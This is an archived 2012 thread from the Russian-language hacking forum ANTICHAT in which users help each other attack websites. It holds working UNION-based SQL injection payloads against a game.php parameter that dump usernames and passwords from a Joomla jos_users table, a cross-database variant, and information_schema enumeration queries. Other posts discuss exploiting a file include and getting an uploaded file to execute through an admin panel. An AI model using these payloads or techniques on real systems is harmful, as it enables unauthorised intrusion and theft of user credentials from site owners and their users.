ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.05.2012, 21:45
|
|
Участник форума
Регистрация: 31.01.2010
Сообщений: 170
Провел на форуме:
1442841
Репутация:
63
|
|
Сообщение от Cock3r
Cock3r said:
как получить список пользователей wordpress?без админки
если есть скуль,то раскручивать ее до инфы с таблицы wp_users
|
|
|
04.05.2012, 21:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
3318
Репутация:
0
|
|
Сообщение от Compton
Compton said:
если есть скуль,то раскручивать ее до инфы с таблицы wp_users
а если нету?
|
|
|
|
04.05.2012, 22:47
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Вы хотите без уязвимости сделать дамп БД? Извините, Вы не маг случайно?
|
|
|
|
05.05.2012, 03:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
97332
Репутация:
38
|
|
Есть инклуд, есть ава, есть ошибка, по которой виден путь.
Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.
Это Mod rewrite шалит?
Как понять что за фигня?
|
|
|
|
05.05.2012, 10:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Сообщение от None
Это Mod rewrite шалит?
мод реврайт не действует для инклудов
Сообщение от None
Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.
ну вот наверное не на 1 сервере, или что то не правильно делаешь, чтобы наверняка найди настройки апача и посмотри есть ли там такой хост
Сообщение от None
Как понять что за фигня?
если сам не можешь, выложи, что гадать то, мож и поможет кто
|
|
|
|
05.05.2012, 11:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
54593
Репутация:
0
|
|
Раскручиваю sql- иньекцию.
Наугад нашел таблицу games.
Запрос вида:
Сообщение от None
game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+games--
работает.
Запрос типа:
Сообщение от None
game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+jos_users--
не работает.
Хотя таблицу games в БД я найти не могу. А таблицу jos_users - могу найти. но вывести данные не получается.
Сообщение от None
game.php?gameid=-1+union+select+1,UNHEX(HEX(COLUMN_NAME)),3,4,5,6,7 ,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E=0x6a6f735f7573657273+LIMIT+2,1%20--
- срабатывает.
Подозреваю на фильтрацию или некорректную кодировку в базе данных.
Вопрос, как можно будет зафильтровать jos_users, чтобы можно было делать запросы и выводить данные из логина-паролей типа:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]game[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]gameid[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x03a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
|
|
|
|
05.05.2012, 11:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
А я подозреваю что таблица в другой бд
|
|
|
|
05.05.2012, 12:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
54593
Репутация:
0
|
|
Если в таком случае - как правильно создать запрос для вывода данных из другой базы данных?
|
|
|
|
05.05.2012, 13:37
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to Muracha
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]game[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]gameid[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x03a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]anotherdb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jos_users[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
Для вывода таблиц из другой базы данных
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]select table_name from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables where table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'anotherdb'[/COLOR][COLOR="#0000BB"]limit 0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
Так же делаем с колонками
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]select column_name from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]columns where table_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'jos_users'[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'anotherdb'[/COLOR][COLOR="#0000BB"]limit 0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
|
|
|
|
05.05.2012, 16:49
|
|
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568
Репутация:
1
|
|
Не знаю туда или нет, но все-таки спрошу:
Есть доступ к админке, там есть возможность заливки pdf файла. В итоге файл получает ссылку вида http://shell.com/download.php?id=418.
В БД никаких упоминай о файле... По крайней мере в данных к которым у меня есть доступ.
Вопрос в том как этот файл запустить.
P.S По этой ссылке выдает ошибку "Не удалось загрузить документ PDF.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
